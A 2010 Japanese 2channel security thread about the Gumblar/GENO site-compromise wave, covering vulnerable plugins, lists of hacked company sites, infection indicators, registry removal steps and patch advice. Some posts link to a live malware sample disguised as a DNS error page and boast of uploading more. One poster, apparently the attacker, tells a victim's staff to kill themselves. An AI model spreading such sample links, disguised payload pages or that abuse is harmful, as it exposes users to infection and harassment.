このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる

(以下略)



これってつまり、IE保護モードで今回のリスクは回避されないんじゃね?

701:名無しさん@お腹いっぱい。
10/01/08 15:30:21
保護モードは一部回避可能だけど、
Flashの脆弱性を狙うコードが保護モード回避したとかの話は聞いたこと無い
テストコードは出ても、実際にそれを使ったマルウェア等は出てない

702:名無しさん@お腹いっぱい。
10/01/08 15:30:29
感染実験したいからURLくれ

703:名無しさん@お腹いっぱい。
10/01/08 15:34:25
>>696
そこ見ても、保護モードのシステムの管理下で動作するだけで、
勝手にシステムとかに書き込めるわけじゃないじゃん

704:名無しさん@お腹いっぱい。
10/01/08 15:42:33
>>694
>Adobe Readerの脆弱性攻撃は、「ChangeLog.pdf」というPDFファイルの中に
>複数の攻撃コードが組み込まれており、パソコンにAdobe Readerがインストールされている場合には、
>この細工されたPDFファイルを自動的に開いて攻撃を行う。


↑保護モードでは通過してしまうプロセスを悪用してるんじゃないのかと

705:名無しさん@お腹いっぱい。
10/01/08 16:02:33
>>脆弱性でやられてもまず影響が出ない
そういえばJavaがウイルスのローダーとして悪用されていた件
脆弱性以前の問題だよね・・・

706:名無しさん@お腹いっぱい。
10/01/08 16:22:12
もうどんな防御しようと無意味なんじゃないかって思えてきた


707:名無しさん@お腹いっぱい。
10/01/08 16:24:38
OSなりブラウザを仮想化すれば良いではないか

708:名無しさん@お腹いっぱい。
10/01/08 16:28:59
そういう手段しか思いつかないレベルってことですね

709:名無しさん@お腹いっぱい。
10/01/08 16:33:53
>>706-708
NO

Adobeがちゃんと脆弱性塞いでれば良いだけの話
もっと言えばMSが情報公開して協力してれば良いだけの話
攻撃自体は単純

710:名無しさん@お腹いっぱい。
10/01/08 16:35:30
警視庁も動きだしたそうじゃないか
どこまでできるのかわからんけど

711:名無しさん@お腹いっぱい。
10/01/08 16:37:16
>>709
>MSが情報公開して協力
誰に?

712:名無しさん@お腹いっぱい。
10/01/08 16:38:20
>>711
Adobeに

713:名無しさん@お腹いっぱい。
10/01/08 16:46:25
JavaもReaderもアンインストール
WindowsとFlashは最新
ばっちこいや

714:名無しさん@お腹いっぱい。
10/01/08 16:51:55
>>713
最終ステップ:Windowsもアンインストール

715:名無しさん@お腹いっぱい。
10/01/08 16:54:29
Web サイト改ざんに関する情報提供のお願い
URLリンク(www.jpcert.or.jp)

716:名無しさん@お腹いっぱい。
10/01/08 17:09:01
WIN7は感染しないんですか?

717:名無しさん@お腹いっぱい。
10/01/08 17:21:20
ゲームやケータイのブラウザが最強だな
感染する場所がありゃしないぜ!

718:名無しさん@お腹いっぱい。
10/01/08 17:22:16
もうみんなでマカーになろうよ

719:名無しさん@お腹いっぱい。
10/01/08 17:34:42
つlinux

720:名無しさん@お腹いっぱい。
10/01/08 17:38:33
凄い初心者な質問で申し訳ないけど
普段から使ってるもの一通り最新版にしておけばGumblarに限らず
大体のウイルスにかからないもんなの?

721:名無しさん@お腹いっぱい。
10/01/08 17:42:15
さきほどGENOウィルスが仕込まれてる可能性の高いURLを踏んでしまいました。
慌てて途中でブラウザを閉じたのですが感染してるか心配です。
こちらの(URLリンク(www29.atwiki.jp))GENOウイルスまとめサイトに書かれていた方法を確認し
感染の可能性は低いと判断しましたが、このサイトの情報は古いと書いてあったので
本当に無事なのかちょっと心配です。
上記サイトに書かれている方法以外に感染を判断する方法はありますか?

722:名無しさん@お腹いっぱい。
10/01/08 17:46:26
>>720
古いバージョンの脆弱性を狙うタイプのウイルスは防げるかと思われ

それ以外にも例えばAdobeReaderのjsOFFみたいな機能設定に関する脆弱性とか、
そもそも実行型ファイルを開いて感染する場合もあると思うけども

723:名無しさん@お腹いっぱい。
10/01/08 17:47:13
>>720
一通り最新版にして適切な設定にしていれば助かる可能性は高くなる
なんでもかんでも自動実行されるPCだとGumblarに限らず危険って事

724:名無しさん@お腹いっぱい。
10/01/08 17:49:41
>>709
Adobeの対応悪すぎだよな。
過去のMicrosoftと同じ過ちを繰り返してる。
みんな歴史に学べないねぇ。

725:名無しさん@お腹いっぱい。
10/01/08 17:51:14
>>720
新型はふせげねー、新型にあたったらクリーンインストールするしかない

726:名無しさん@お腹いっぱい。
10/01/08 17:51:38
やっとAdobeの修正がきたみたいだね
URLリンク(internet.watch.impress.co.jp)

727:名無しさん@お腹いっぱい。
10/01/08 17:53:01
来週の話でしょ。
対応遅すぎ。

728:名無しさん@お腹いっぱい。
10/01/08 17:54:32
なんでそんな悠長に構えてんだろうなアドビ
自分とこの製品が犯罪に利用されてるってのに

729:名無しさん@お腹いっぱい。
10/01/08 17:56:43
AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。

730:名無しさん@お腹いっぱい。
10/01/08 17:57:04
競合相手がいないからさ

731:名無しさん@お腹いっぱい。
10/01/08 17:59:09
>>720
感染しているPCはCPU使用率が異常に高いのも目安のひとつだな

732:名無しさん@お腹いっぱい。
10/01/08 17:59:23
サイト改ざんリスト(発表分のみ)
URLリンク(www.so-net.ne.jp)

三栄コーポレーション
サイバーエージェント
ハウス食品
東京財団
データリンクス
京王電鉄
ビロング
恵那バッテリー電装
ナショナルクリエイターズカンファレンス
大学図書館問題研究会
モロゾフ
民主党東京都総支部連合会
ローソン
検索エンジンMooter
デジタルマガジン
ディズニー
信越放送
FX為替情報検索「fxwill.com」
野村ビルマネジメント
京成トラベルサービス
本田技研工業
JR東日本
ラジオ関西


しかし、とんでもねー数だな…

733:名無しさん@お腹いっぱい。
10/01/08 18:02:14
adobeもアレだけど感染した企業のセキュリティに対する認識の甘さも問題だな


734:名無しさん@お腹いっぱい。
10/01/08 18:02:32
猛威をふるうガンブラーの徹底対策術
URLリンク(www.yomiuri.co.jp)

735:名無しさん@お腹いっぱい。
10/01/08 18:02:43
/*LGPL*/
URLリンク(www.virustotal.com)
対応済み:Avira カスペ NOD32

736:名無しさん@お腹いっぱい。
10/01/08 18:02:49
CVE-2009-4324

VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
URLリンク(vrt-sourcefire.blogspot.com)

extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
URLリンク(extraexploit.blogspot.com)

737:名無しさん@お腹いっぱい。
10/01/08 18:04:25
>>732
ここらのサイトやアメブロなんかで気づかずに感染してる一般人って相当数いるんじゃね?
今回のは自分が感染してるかどうか分からないみたいだし…

738:名無しさん@お腹いっぱい。
10/01/08 18:05:29
>>732
ネズミーもか!?
閲覧者多そうだしますますやばいな

739:名無しさん@お腹いっぱい。
10/01/08 18:09:37
>>721
一応他スレから転載

437 :8080:2010/01/08(金) 18:03:07 ID:Db0zlWvOO
>>435
旧Gumblarのやつは使えない。


【感染確認方法】
msconfigでスタートアップにsiszyd32.exeとTMD.tmpがあったらご愁傷様(感染確定)

削除はネットワークから切り離して、セーフモードで起動させ
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
削除
※sysgif32で検索

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
ファイルを削除


*感染していた場合*
駆除するより、バックアップを取ってから
リカバリ(クリーンインストール)を強く推奨。

740:名無しさん@お腹いっぱい。
10/01/08 18:09:37
>>732
ディズニー見ちゃったよ
いつの時点で改ざんされてたんだろう

741:名無しさん@お腹いっぱい。
10/01/08 18:10:19
>>737-738
リンク先読めばわかるけど、大体の企業は
「特定のページがやられてて、それ以外は今のところ異常ない」って建前らしい。

まあ、ウイルスの全貌が解析されきってない以上
実際のところはどうだかわかったもんじゃないけどね。

742:名無しさん@お腹いっぱい。
10/01/08 18:11:01
>>740
リンク先に詳しく書いてある。

743:名無しさん@お腹いっぱい。
10/01/08 18:14:29
>>742
Forbiddenってなる

744:名無しさん@お腹いっぱい。
10/01/08 18:15:51
>>732

>■検索エンジンMooter(2009年12月30日発表)
>種別:/*GNU GPL*/
>期間:2009年12月25日1時~12月28日18時30分
>場所:Mooterホームページ(*.mooter.co.jp)、および「Mooter検索窓」の設置サイト
>告知:弊社ホームページの改ざんについてのお詫びとお知らせ(削除済み)

こことか地味に酷くね?
検索窓設置してるサイトもやられてるとしたら、どこまで広がってるか…
しかも告知「削除済み」とか対応がありえねえだろ。

745:名無しさん@お腹いっぱい。
10/01/08 18:15:55
>>743
は?

746:名無しさん@お腹いっぱい。
10/01/08 18:16:52
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時~12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
URLリンク(www.disney.co.jp)

しょうがないやつだ。念のためおまえのPCはクリーンインストールして来い

747:名無しさん@お腹いっぱい。
10/01/08 18:17:40
>>743

>■ディズニー(2009年12月29日発表)
>種別:Gumblar.x
>期間2009年12月22日16時~12月25日18時
>場所:ショッピングサイト お正月特集ページ(www.disney.co.jp●shopping/special/0912_newyear.html)
>告知:お正月特集ページに関するお詫び
>www.disney.co.jp●shopping/pop/091229_info.html

748:名無しさん@お腹いっぱい。
10/01/08 18:18:27
>>743
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時~12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
URLリンク(www.disney.co.jp)

749:名無しさん@お腹いっぱい。
10/01/08 18:19:16
>>735
>>592 を再スキャンしてみた
定義データでは一部のスクリプトだけの検出だな・・・
本格的な対応はこれからか

結果: 0/41
URLリンク(www.virustotal.com)
結果: 0/41
URLリンク(www.virustotal.com)
結果: 1/41 (Sophos)
URLリンク(www.virustotal.com)

750:名無しさん@お腹いっぱい。
10/01/08 18:20:54
でもまぁ、
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

の対策が取れてたら感染サイト踏んでたとしても大丈夫なはずだが一応

751:名無しさん@お腹いっぱい。
10/01/08 18:21:11
>>746-748
わざわざすいません
該当する期間とショッピングサイトには行っていないから
なんとかセフセフ


752:名無しさん@お腹いっぱい。
10/01/08 18:23:48
New谷さん大丈夫かね

748 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/08(金) 18:18:27
>>743
■ディズニー(2009年12月29日発表)
種別:Gumblar.x
期間2009年12月22日16時~12月25日18時
場所:ショッピングサイト お正月特集ページ(www.disney.co.jp/shopping/special/0912_newyear.html)
告知:お正月特集ページに関するお詫び
URLリンク(www.disney.co.jp)

753:名無しさん@お腹いっぱい。
10/01/08 18:24:12
>>750
スレリンク(sec板:405番)
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す

754:名無しさん@お腹いっぱい。
10/01/08 18:25:05
もともとスクリプトを検出していたのは少ない
win.jpgなどの脆弱性を突いた攻撃自体を検出した方が効率的だろ
脆弱性攻撃を受けた後実行されるpdfupf.exeだけを検出すものもあるがこれでも防御は可能


755:名無しさん@お腹いっぱい。
10/01/08 18:26:28
>>739の感染確認方法ってどうなの?

756:名無しさん@お腹いっぱい。
10/01/08 18:27:45
現時点じゃ他に確認のしようがない

757:名無しさん@お腹いっぱい。
10/01/08 18:28:11
「New谷さん」呼びはやめろよな

758:名無しさん@お腹いっぱい。
10/01/08 18:30:20
>>755
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
の部分は新しいやつで
"~TM6.tmp"="C:\\WINDOWS\\TEMP\\~TM6.tmp"
に変わってる
しかし同じような名前なのですぐ気づく
これからも変わるかも知れないが変な物が登録されているかはすぐ分かるだろう


759:名無しさん@お腹いっぱい。
10/01/08 18:34:06
>>758
詳しくありがとうございます

760:752
10/01/08 18:37:49
ごめん誤爆だった

761:名無しさん@お腹いっぱい。
10/01/08 18:40:31
このあいだfirefox NoScript+view-source:で
感染サイトのソース見ようとしたらavast!がプゥプゥいった。
この状況でも感染するもの?
adobeのjavaはオフにしてある。

762:名無しさん@お腹いっぱい。
10/01/08 18:40:40
糸色望した

763:名無しさん@お腹いっぱい。
10/01/08 18:42:29
>>761
その場合はNoScriptでブロックされているはず
問題ない

>adobeのjavaはオフにしてある。
Tips:JavaとJavaScriptは別物

764:名無しさん@お腹いっぱい。
10/01/08 18:48:29
view-sourceだけでも安全な気がしてたんだが・・・
違うのね

765:名無しさん@お腹いっぱい。
10/01/08 18:49:05
安全だよ

766:名無しさん@お腹いっぱい。
10/01/08 18:49:37
txtとして開くんだから大丈夫じゃないの?

767:名無しさん@お腹いっぱい。
10/01/08 18:52:52
txt形式でもウイルスのコード記述があれば反応するのでは
感染はしないけど

768:名無しさん@お腹いっぱい。
10/01/08 18:52:58
>>763ありがとう
ていうかview-source:ってリンク先のサイト踏まずに
ソースがみれるものだと思ってたんだがウイルスは防げないのか…
オンラインソースチェッカー閉鎖が惜しまれる

769:名無しさん@お腹いっぱい。
10/01/08 18:54:52
オンラインソースチェッカーの代わりに
URLリンク(www.aguse.jp)
じゃだめなのか?

770:名無しさん@お腹いっぱい。
10/01/08 18:55:57
>>768
見れると思うけど
>>550
URLリンク(www.aguse.jp)

771:名無しさん@お腹いっぱい。
10/01/08 18:57:21
初心者で申し訳ないんだけど、>>753の(1)~(4)に加えて
IEでセキュリティ高にしたり、firefox+NoScript使えばさらに安全になるのかな?

772:名無しさん@お腹いっぱい。
10/01/08 18:57:43
>>710
モロゾフの人がFTPログを証拠として被害届けを出したそうですね
でもあれは不正アクセスの証明にしかなりませんね

モロゾフの人健忘症なのでしょうかね
自身が加害者であることは伝えてあるのですが
対応が駄目駄目です

>モロゾフの人
首吊って氏んだ方がいいとおもいますよ

773:名無しさん@お腹いっぱい。
10/01/08 18:58:48
URLリンク(www.aguse.jp)
ってソースどこに表示されるの?
ホストだとかドメインだとかは出てくるんだけど

774:772EM114-48-42-165.pool.e-mobile.ne.jp
10/01/08 19:01:01
>モロゾフの人
文句があったらかかってきなさい

-o_japan-オルティスジャパンー

775:名無しさん@お腹いっぱい。
10/01/08 19:02:20
>>773
調べたいサイトのURLを入力してクリック
結果のページ右のスクリーンショット(クリックすると拡大します)これで見られます

776:名無しさん@お腹いっぱい。
10/01/08 19:02:22
飛び先チェック
URLリンク(kakiko.com)

777:名無しさん@お腹いっぱい。
10/01/08 19:03:23
更新するものは最新版に更新して、
Adobe Reader、JRE、QuickTimeとか大して使わないものはアンインストール
Adobe Readerなんて他の無料で軽いの使えばいいんだし
これが一番の防御策だね

778:名無しさん@お腹いっぱい。
10/01/08 19:03:30
>>775
ゴメンこれはサイトを見たいときね

779:sage ◆sage/xLnlI
10/01/08 19:09:32
>>702
検体(コードが書いてあるやつ)いるならあげる
うpできるかわからないけど

780:名無しさん@お腹いっぱい。
10/01/08 19:09:48
>>776
これ知らなかった
ありがとう

781:名無しさん@お腹いっぱい。
10/01/08 19:12:39
ドクター中松さんのサイトは修正済みみたいだね

782:名無しさん@お腹いっぱい。
10/01/08 19:17:18
>>159
ここはまだだね
いつの間にかLGPLに変わってるし

783:名無しさん@お腹いっぱい。
10/01/08 19:18:42
>>738
なんで馬鹿みたいにネズミーとか言うんだろ
長くてみんどくさいならTDLとかでいいじゃん
何かスゲーむかついたので
>ネズミー

784:名無しさん@お腹いっぱい。
10/01/08 19:19:11
>>782
どういう人かと思って検索したら驚いた

785:名無しさん@お腹いっぱい。
10/01/08 19:20:42
>>783
いちいち言わなくて良いよ

786:名無しさん@お腹いっぱい。
10/01/08 19:21:01
>>782
LGPLだね
元がどうだったか知らないけど


787:名無しさん@お腹いっぱい。
10/01/08 19:37:29
このブラウザ使えるかもしれん
URLリンク(www.scriptbrowserk.com)

コンテンツブロックに*:8080/*を放り込m(ry

788:名無しさん@お腹いっぱい。
10/01/08 19:45:43
「GNU(ぐぬー)たん」
お馴染みのヌーを萌擬人化したキャラ

誰か・・・描いて・・・

789:名無しさん@お腹いっぱい。
10/01/08 19:50:47
>>773
右上のスクリーンショットの下からいけるGatewayへ。
上のフレームにある「ソース表示」でソースを持ってこれる。
だから、最初からGatewayに行ったらいいんじゃないかな。
URLリンク(gw.aguse.jp)
逆に、ここからaguseに行くことも可能(フレームの「ウェブ調査」)。

790:名無しさん@お腹いっぱい。
10/01/08 20:12:15
ノートンは対応してないのか・・・
>>739の方法で調べて
スタートアップにsiszyd32.exeとTMD.tmpの両方なかったら
この手のウイルスには感染していないでFA?
感染してないと思うけど気になるので

791:名無しさん@お腹いっぱい。
10/01/08 20:13:10
朝刊の一面になるほどのニュースなのに
対策していない企業とかマジでありえない
対策していないネットユーザにも責任はあるが
そのままWEBサイトを放置している企業の責任は重大

792:名無しさん@お腹いっぱい。
10/01/08 20:19:08
>>790
ノートンは脆弱性保護で最初から対応してる
今はファイルも検出する

793:名無しさん@お腹いっぱい。
10/01/08 20:21:30
>>159
こちらがまだだったのでVPCで踏んでみた。
特に何も起こらない・・・

フラッシュのバージョンが10.0.42.34だと影響ないということ?

794:名無しさん@お腹いっぱい。
10/01/08 20:22:27
>>792
ありがとう、少し安心した

795:名無しさん@お腹いっぱい。
10/01/08 20:23:21
>>793
Flashは関係ない

796:名無しさん@お腹いっぱい。
10/01/08 20:24:43
>>794
感染が気になるならスタートアップ確認でOK
さらに言えばタスクマネージャーで確認

797:790
10/01/08 20:31:54
>>796
タスクマネージャーにもmsconfigで見たスタートアップにも
siszyd32.exeとTMD.tmpは影も形もなかったよ、よかった
みんな教えてくれてありがとう


798:名無しさん@お腹いっぱい。
10/01/08 20:35:03 BE:1098795874-2BP(7777)
>>797
早い話
オンラインスキャン汁

799:名無しさん@お腹いっぱい。
10/01/08 20:37:35
オンラインスキャンしたところで検出できるやつがなかったりするからな

800:名無しさん@お腹いっぱい。
10/01/08 20:41:04
>>799
オワタ\(^o^)/

今でも(´・ω・) スクリプトが埋め込まれているうrlplz

801:名無しさん@お腹いっぱい。
10/01/08 20:51:06
Quick Time ですけど、QuickTime Alternativeはどうなんでしょ?入れて置いてもいいの?
アホな質問しているのかしら…。

802:名無しさん@お腹いっぱい。
10/01/08 21:02:06
>>783
TDLのガイドライン・・・

803:sage ◆sage/xLnlI
10/01/08 21:08:21
>>800
おk
うpしてくる(自分のサイトに)

804:名無しさん@お腹いっぱい。
10/01/08 21:13:00
>>803
お前はさっきから何がしたいんだ?

805:sage ◆sage/xLnlI
10/01/08 21:13:40
URLリンク(www16.atpages.j)p/filedl/dnserror.html

検体的なもの(アクセスすると危険)

806:名無しさん@お腹いっぱい。
10/01/08 21:18:10
>>805
エラーにみせかけるとな?
鬼畜ですな

807:名無しさん@お腹いっぱい。
10/01/08 21:27:28
>>805
/*GNU GPL*/

808:名無しさん@お腹いっぱい。
10/01/08 21:33:55
>>805
カスペルスキー無反応
win7
firefox カスペルスキー仮想実行モード

809:ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
10/01/08 21:41:15
>>808
それやばい

810:ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
10/01/08 21:43:09
>>806
エラー画面をみて思いつきましたw

811:名無しさん@お腹いっぱい。
10/01/08 21:45:22
まいど。
URLリンク(www.okamoto.co.jp)
KIS2010で検出。

812:名無しさん@お腹いっぱい。
10/01/08 21:47:22
新ウイルスに対応したオンラインスキャナーないのかよ・・・
アンチウイルスソフトをインスコするたびにBSOD祭りの俺はどうすれば・・・

813:名無しさん@お腹いっぱい。
10/01/08 21:51:26
>>811


Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

>>811

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:50:29
Kaspersky Internet Security 2010

814:ZK000167.ppp.dion.ne.jp sage ◆sage/xLnlI
10/01/08 21:52:22
>>812
なにそれこわい
明日は京都は違う検体をupします
種類も変えます(明日も鬼畜なやつにしようwwwwwwフヒッwwwwwww)


upの仕方

コードを書いてtxtに

up

txtをhtmlに書き換え

ヽ('A`)ノ 完成!
 (  )
 ノω|


815:名無しさん@お腹いっぱい。
10/01/08 21:53:47
感染の有無をチェックする無料のオンラインスキャンサービス

URLリンク(www.trendflexsecurity.jp)
URLリンク(security.symantec.com)



次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch